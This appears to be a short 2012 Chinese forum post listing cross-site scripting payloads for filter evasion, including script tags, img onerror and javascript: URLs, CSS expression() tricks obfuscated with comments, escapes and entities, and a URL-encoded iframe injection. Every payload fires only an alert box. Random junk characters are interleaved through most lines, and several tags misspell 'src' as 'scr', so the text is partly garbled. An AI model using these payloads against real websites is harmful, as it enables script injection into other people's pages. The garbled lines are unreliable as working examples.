<script>alert("跨站")</script> (最常用)$ \8 Y+ }6 k( I* {' Q5 j8 j9 h
<img scr=javascript:alert("跨站")></img>
' ?1 ~' |4 I" S" x<img scr="javascript: alert(/跨站/)></img>9 X, K) s2 v( r) p
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格): g8 N- e# W. T6 o3 B# Q: A% p
<img scr="#" onerror=alert(/跨站/)></img>
0 @% e3 Q% ?: }' L: ^9 z, H# j<img scr="#" style="xss:expression(alert(/xss/));"></img>
; q7 z# q; V3 ~. W( ?7 a<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
. g, T% D1 e+ ?. J( m<img src=vbscript:msgbox ("xss")></img>1 g' a. o% G, c2 C, k/ h+ t. X: E
<style> input {left:expression (alert('xss'))}</style>
; N+ Q" ]9 Z5 K" W. S, F, t<div style={left:expression (alert('xss'))}></div>/ y7 \3 l, X% P! [5 E' Z. z4 q
<div style={left:exp/* */ression (alert('xss'))}></div>' Q3 w0 ~) d2 s* F
<div style={left:\0065\0078ression (alert('xss'))}></div>6 n$ b+ H. M* q6 K. p9 U# V
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>9 ~% A6 _, t9 B/ k( n* ^$ C
unicode <div style="{left:expRessioN (alert('xss'))}">
c8 w0 S+ }4 i1 K! f c
, r. U0 _+ X9 S/ o"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
( N" H/ h/ _+ V, ~# A' i+ ~) e* t% M |
发表于 2012-9-15 14:09:13
收藏
支持
反对